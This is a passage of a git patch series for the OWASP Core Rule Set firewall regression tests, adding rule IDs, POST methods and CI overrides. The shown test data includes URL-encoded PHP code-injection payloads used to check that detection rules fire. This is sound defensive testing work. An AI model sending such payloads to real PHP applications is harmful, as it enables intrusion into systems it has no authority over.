(https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 9 # stages: # - input: @@ -277,7 +277,7 @@ tests: # output: # log: # expect_ids: [920480] - # TODO: this test should pass (works with curl), to be researched + # TODO: this test should pass (works with curl), to be researched (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 10 # stages: # - input: @@ -310,7 +310,7 @@ tests: output: log: expect_ids: [920480] - # TODO: this case is not yet checked by CRS, future work + # TODO: this case is not yet checked by CRS, future work (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 12 # stages: # - input: @@ -327,7 +327,7 @@ tests: # output: # log: # expect_ids: [920480] - # TODO: this case is not yet checked by CRS, future work + # TODO: this case is not yet checked by CRS, future work (https://github.com/coreruleset/coreruleset/issues/3743) # - test_id: 13 # stages: # - input: diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml index ed0a6b4b9..edcc2c582 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 9333110 tests: - test_id: 1 desc: PHP no file upload diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml index b93c8ba6e..380694bd4 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 933180 tests: - test_id: 1 desc: PHP variable functions @@ -28,6 +29,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24a%281%29' version: "HTTP/1.1" @@ -44,6 +46,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24%24b%282%29' version: "HTTP/1.1" @@ -60,6 +63,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24_%283%29' version: "HTTP/1.1" @@ -76,6 +80,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%40%24__%5Bo%5D%284%29' version: "HTTP/1.1" @@ -92,6 +97,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%27o%27%5D%285%29' version: "HTTP/1.1" @@ -108,6 +114,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%40o%5D%286%29' version: "HTTP/1.1" @@ -124,6 +131,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%24_%5B1%5D%5D%287%29' version: "HTTP/1.1" @@ -140,6 +148,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24__%5B%40%24c%5D%288%29' version: "HTTP/1.1" @@ -156,6 +165,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: '%24d%5B%27o%27%5D%289%29' version: "HTTP/1.1" @@ -172,6 +182,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24%7B%40a%7D%2810%29' version: "HTTP/1.1" @@ -220,6 +231,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: '%24%7B%24s20%7D%5B%27q53b3a6%27%5D%2813%29' version: "HTTP/1.1" @@ -236,6 +248,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24GLOBALS%5B%27cf908275%27%5D%2814%29' version: "HTTP/1.1" @@ -252,6 +265,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'c=%24OOO000000%7B0%7D%2815%29' version: "HTTP/1.1" @@ -300,6 +314,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'x=%24_aB_4c%5B%405%5D%2F%2Awat%2A%2F%5B%40d%5D%20%28%29' version: "HTTP/1.1" @@ -316,6 +331,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'y=%24_aB_4c%2F%2Afoo%2A%2F%5B%405%5D%2F%2Abar%2A%2F%5B%40d%5D%2F%2Abaz%2A%2F%2819%29' version: "HTTP/1.1" @@ -364,6 +380,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24b374k%3D%40%24s_func%2822%29' version: "HTTP/1.1" @@ -380,6 +397,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: 'foo=%24function%0D%0A%20%2823%29' version: "HTTP/1.1" @@ -428,6 +446,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: x=%24_aB_4c%20%23foo%0D%0A%09%5B5%5D%2F%2Fbar%0D%0A%09%5B%27d%27%5D%20%2F%2Afoo%2A%2F%20%2817%29 version: "HTTP/1.1" @@ -556,6 +575,7 @@ tests: User-Agent: "OWASP CRS test agent" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 port: 80 + method: "POST" uri: / data: '%24foo-%3E%24funcname%28%29' version: "HTTP/1.1" diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 9400d085c..a9fafe931 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -17,7 +17,7 @@ skeletontest=0 Meta='''--- meta: - author: "spartantri" name: "skeletonid.yaml" + author: "spartantri" description: "Positive tests for rule skeletonid" tests: ''' diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 408ddceb9..ab0842f9f 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton @@ -34,6 +34,7 @@ Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "skeletondefaultcontenttype" method: "POST" + uri: / version: "HTTP/1.0" data: "skeletonkeyword=test" output: @@ -78,6 +79,7 @@ Content-Type: "skeletondefaultcontenttype" Cookie: skeletonkeyword=test method: "POST" + uri: / version: "HTTP/1.0" data: "test=value" output: @@ -121,6 +123,7 @@ Accept-Language: "skeletondefaultacceptlanguage" Content-Type: "application/xml" method: "POST" + uri: / version: "HTTP/1.0" data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" output: From 0a90b76f4166612bb6e28e991cbe21ad4b0ba1b2 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 20 Jun 2024 21:39:49 +0200 Subject: [PATCH 15/18] chore: handle httpd segfaults --- tests/regression/httpd-overrides.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml index 8e39a7abc..3bc22d58f 100644 --- a/tests/regression/httpd-overrides.yaml +++ b/tests/regression/httpd-overrides.yaml @@ -14,9 +14,9 @@ test_overrides: no_expect_ids: [920360] - rule_id: 920370 test_ids: [1] - reason: Exceeds PCRE limits + reason: Exceeds PCRE limits, currently segfaults on the CI output: - status: 200 + expect_error: true log: no_expect_ids: [920360] - rule_id: 920380 @@ -28,8 +28,8 @@ test_overrides: no_expect_ids: [920280] - rule_id: 920390 test_ids: [1] - reason: Exceeds PCRE limits + reason: Exceeds PCRE limits, currently segfaults on the CI output: - status: 200 + expect_error: true log: no_expect_ids: [920390] From 6567ca2765ec19b2afe4879f87f3ce92600774b9 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Thu, 20 Jun 2024 21:52:11 +0200 Subject: [PATCH 16/18] chore: override bad test 920370 --- tests/regression/httpd-overrides.yaml | 8 ++++---- .../tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml | 1 + 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml index 3bc22d58f..19c3a957e 100644 --- a/tests/regression/httpd-overrides.yaml +++ b/tests/regression/httpd-overrides.yaml @@ -14,18 +14,18 @@ test_overrides: no_expect_ids: [920360] - rule_id: 920370 test_ids: [1] - reason: Exceeds PCRE limits, currently segfaults on the CI + reason: Doesn't trigger. Needs to be fixed (https://github.com/coreruleset/coreruleset/issues/3745) output: - expect_error: true + status: 200 log: - no_expect_ids: [920360] + no_expect_ids: [920370] - rule_id: 920380 test_ids: [1] reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value output: status: 200 log: - no_expect_ids: [920280] + no_expect_ids: [920380] - rule_id: 920390 test_ids: [1] reason: Exceeds PCRE limits, currently segfaults on the CI diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml index f1f04baa6..e7011333c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml @@ -1,6 +1,7 @@ --- meta: author: csanders-git + # Needs to be fixed: https://github.com/coreruleset/coreruleset/issues/3745 # PCRE limits need to be set higher to process this rule_id: 920370 tests: From c6816dda37b05115d67308e1896cf98b27310192 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Sat, 22 Jun 2024 07:52:14 +0200 Subject: [PATCH 17/18] chore: update to go-ftw v1.0.3 --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index f8c201c22..7bfb86101 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '1.0.2' + GO_FTW_VERSION: '1.0.3' jobs: regression: From c8d3f520773c4e21d56493a39086e51adcc74484 Mon Sep 17 00:00:00 2001 From: Max Leske <250711+theseion@users.noreply.github.com> Date: Sat, 22 Jun 2024 08:16:00 +0200 Subject: [PATCH 18/18] fix: add `rule_id` field to all tests --- .../regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml | 1 + .../tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml | 1 + .../tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml | 1 + tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 3 ++- tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 1 + .../tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml | 1 + .../tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml | 1 + .../tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml | 1 + .../tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml | 1 + .../tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml | 3 ++- .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml | 1 + .../tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml | 2 +- .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml | 1 + .../tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml | 1 + 56 files changed, 58 insertions(+), 3 deletions(-) diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 9dd14be72..f7ec8046b 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 913100 tests: - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml index 74db85b94..b5754ad85 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 920300 tests: - test_id: 1 desc: Request Missing an Accept Header (920300) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml index 48cf6f7a5..dd1131aad 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 920440 tests: - test_id: 1 desc: URL file extension is restricted by policy (920440) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml index ed8449861..f023b6a35 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921110.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" +rule_id: 921110 tests: - test_id: 1 desc: "HTTP Response Splitting" @@ -102,7 +103,7 @@ tests: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" User-Agent: "OWASP CRS test agent" Content-Type: text/plain - Content-Length: 36 + Content-Length: "36" method: POST port: 80 uri: "/" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 54f63b364..57318cbb9 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" +rule_id: 921130 tests: - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml index 084806527..46ab1697e 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930120.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 930120 tests: - test_id: 1 desc: Remote File Access Attempt (930120) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml index 6eda72ce1..821b89275 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930121.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 930121 tests: - test_id: 1 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index fe62f3a92..795b312ab 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 931100 tests: - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index b03ef1598..146646540 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 931110 tests: - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 0ae323632..3bf7fb547 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -1,6 +1,7 @@ --- meta: author: "studersi, azurit" +rule_id: 931120 tests: - test_id: 1 desc: Remote File Inclusion Attack (931120) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index d9f5c7581..d67a67c03 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,6 +1,7 @@ --- meta: author: "studersi, azurit" +rule_id: 931130 tests: - test_id: 1 desc: Remote File Inclusion Attack (931130) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 5d1e1291c..76c23d6eb 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,6 +1,7 @@ --- meta: author: "emphazer, azurit" +rule_id: 931131 tests: - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 1eff8d79d..112069387 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 932161 tests: - test_id: 1 stages: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml index 47814322e..f3b239825 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml @@ -4,6 +4,7 @@ meta: description: | Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. If you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule. +rule_id: 932230 tests: - test_id: 1 desc: System Command Injection (932230) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml index 3676f2a3a..3591d48ee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, Esad Cetiner, azurit" +rule_id: 932237 tests: - test_id: 1 stages: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml index 1bf4cbecd..5ab8ae6f4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml @@ -1,6 +1,7 @@ --- meta: author: "Max Leske, Xhoenix, azurit" +rule_id: 932238 tests: - test_id: 1 desc: "9323HNQU" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index 70d0cd95e..8cbb89e80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml @@ -5,6 +5,7 @@ meta: Tests to trigger or not trigger rule 932250. - commands used must be less than 4 chars - [\s<>&|)] is required after a command to reduce FPs +rule_id: 932250 tests: - test_id: 1 desc: Negative test for excluded command `tar` diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index c6824245c..cf96b5e1f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" +rule_id: 933100 tests: - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index 00adca968..9901ec55e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -1,6 +1,7 @@ --- meta: author: "NiceYouKnow, azurit" +rule_id: 933111 tests: - test_id: 1 desc: "PHP Injection Attack: PHP Script File Upload Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index 48d23b566..47955fc8a 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 933120 tests: - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 9b73d9bb9..7d50b91e3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 933140 tests: - test_id: 1 desc: "PHP Injection Attack: I/O Stream" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 9f5fa44d8..c05319b5f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -1,6 